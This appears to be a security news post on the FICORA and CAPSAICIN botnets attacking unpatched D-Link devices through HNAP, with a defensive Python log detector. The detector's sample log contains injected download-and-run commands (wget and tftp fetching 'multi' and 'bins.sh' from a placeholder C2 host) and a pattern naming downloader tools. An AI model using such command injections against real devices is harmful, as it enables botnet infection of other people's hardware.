2024-12-27
Unpatched Legacy Devices Remain Vulnerable as Mirai and Keksec Variants Launch Fresh Attacks
Legacy devices, those that are outdated and no longer supported by their manufacturers, pose a significant security risk. They often carry known vulnerabilities that attackers can exploit to gain access to systems and launch further attacks. This article discusses two recent botnet campaigns, FICORA and CAPSAICIN, that targeted unpatched D-Link devices.
Both campaigns hit unpatched D-Link devices in late 2024. The attackers exploited known vulnerabilities (CVE-2024-33112) in these devices through the HNAP protocol to execute malicious commands remotely. The FICORA botnet operated from servers located in the Netherlands and attacked targets across the world, while the CAPSAICIN botnet showed a brief but intense burst of activity aimed at East Asian countries.
The FICORA botnet deployed a shell script named “multi” that downloaded the malware using several methods in turn: wget, ftpget, curl, and tftp. The downloader script targeted various Linux architectures, killed any process whose file extension matched the malware’s (“FICORA”), and then downloaded and executed the malware, which is encoded with ChaCha20. FICORA is a Mirai variant: it uses hardcoded credentials for brute-force attacks, embeds a shell script that kills competing malware (“dvrHelper”), and uses the UDP, TCP, and DNS protocols for DDoS attacks.
The CAPSAICIN botnet used a downloader script named “bins.sh” to retrieve and execute malware built for various Linux architectures. The variant’s name is revealed on execution by a pop-up displaying “CAPSAICIN.” The malware connects to its C2 server, sends information about the victim host, and then waits for commands from the server and executes them; it also uses the “PRIVMSG” function to set environment variables, which lets the C2 server control the compromised system remotely. It is likely a variant of the Keksec group’s botnet: its DDoS attacks are launched through “PRIVMSG” commands received from the C2 server, and those commands, together with the accompanying help messages, give the malware its range of attack functions and suggest that its development was influenced by version 17.0.0 of the Keksec group’s botnet.
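Both campaigns share the same first two steps the article describes: a command pushed through the device’s HNAP interface, followed by a downloader that fetches the payload with wget, ftpget, curl or tftp. The following detector is an added example written for this post, not code from the report or from either botnet. It scans constructed, simplified web-server log lines (one request per line: source IP, method, path, decoded body excerpt) and flags HNAP requests whose body carries a downloader tool or shell metacharacters; the log format, the C2-PLACEHOLDER host and the severity labels are assumptions.

```python
import re
from collections import Counter

# Constructed sample log (not from the report): "<src_ip> <method> <path> <body_excerpt>".
# The body column is a decoded excerpt of the HNAP SOAP request, or "-" when empty.
SAMPLE_LOG = """\
198.51.100.7 POST /HNAP1/ -
203.0.113.9 POST /HNAP1/ "wget http://C2-PLACEHOLDER/multi; sh multi"
192.0.2.4 GET /HNAP1/ -
203.0.113.9 POST /HNAP1/ "tftp -g -r bins.sh C2-PLACEHOLDER"
198.51.100.7 POST /api/status {"ping":true}
"""

# The fetch tools the FICORA downloader tried in turn, plus the CAPSAICIN script name.
DOWNLOADER = re.compile(r"\b(wget|ftpget|curl|tftp|bins\.sh)\b")
# Shell metacharacters that have no business inside an HNAP SOAP field.
SHELL_META = re.compile(r"[;|`$]")
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")

def classify(line):
    """Return (src_ip, severity, reason) for one log line, or None if it looks benign."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, method, path, body = m.groups()
    if not path.startswith("/HNAP1"):
        return None  # only HNAP traffic is in scope for this rule
    if method == "POST":
        hit = DOWNLOADER.search(body)
        if hit:
            return (src, "high", f"downloader tool '{hit.group(1)}' in HNAP request body")
        if SHELL_META.search(body):
            return (src, "medium", "shell metacharacter in HNAP request body")
    return None

def scan(log_text):
    """Classify every line; also count HNAP POSTs per source to expose scanning hosts."""
    lines = [l for l in log_text.splitlines() if l.strip()]
    alerts = [a for a in (classify(l) for l in lines) if a]
    posts = Counter(l.split()[0] for l in lines if l.split()[1:3] == ["POST", "/HNAP1/"])
    return alerts, posts

if __name__ == "__main__":
    found, per_source = scan(SAMPLE_LOG)
    for src, sev, why in found:
        print(f"[{sev}] {src}: {why}")
    print("HNAP POSTs per source:", dict(per_source))
```

A medium-severity hit on its own is a prompt to inspect the full request; a high-severity hit from a source that also shows repeated HNAP POSTs is the pattern worth blocking and escalating.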
What Undercode Says:
The emergence of these botnet attacks highlights the continued risk posed by unpatched legacy devices. Such devices are easy targets because their vulnerabilities are publicly known and the fixes, where they exist, have never been applied. That these attacks succeeded even though patches were available underscores the importance of timely patching and of robust security measures around the devices that cannot be patched.
Here are some additional takeaways from the article:
The article emphasizes the importance of patching legacy devices. This is a critical security practice that directly reduces the exposure these botnets rely on.
The article also highlights the need for robust monitoring. By watching for suspicious activity, such as unexpected HNAP requests or downloads from unfamiliar hosts, organizations can identify and respond to attacks more quickly.
The article discusses the FICORA botnet’s use of hardcoded credentials and brute-force attacks. This is a common tactic for gaining access to systems. Organizations can reduce the risk by using strong, unique passwords and enabling multi-factor authentication where the device supports it.
The article also discusses the CAPSAICIN botnet’s use of the “PRIVMSG” function to execute DDoS attacks. A DDoS attack overwhelms a target system with traffic, making it unavailable to legitimate users. Organizations can reduce the risk by implementing DDoS protection measures.
By following these security best practices, organizations can help to protect themselves from attacks like those discussed in the article.
References:
Reported By: Cyberpress.org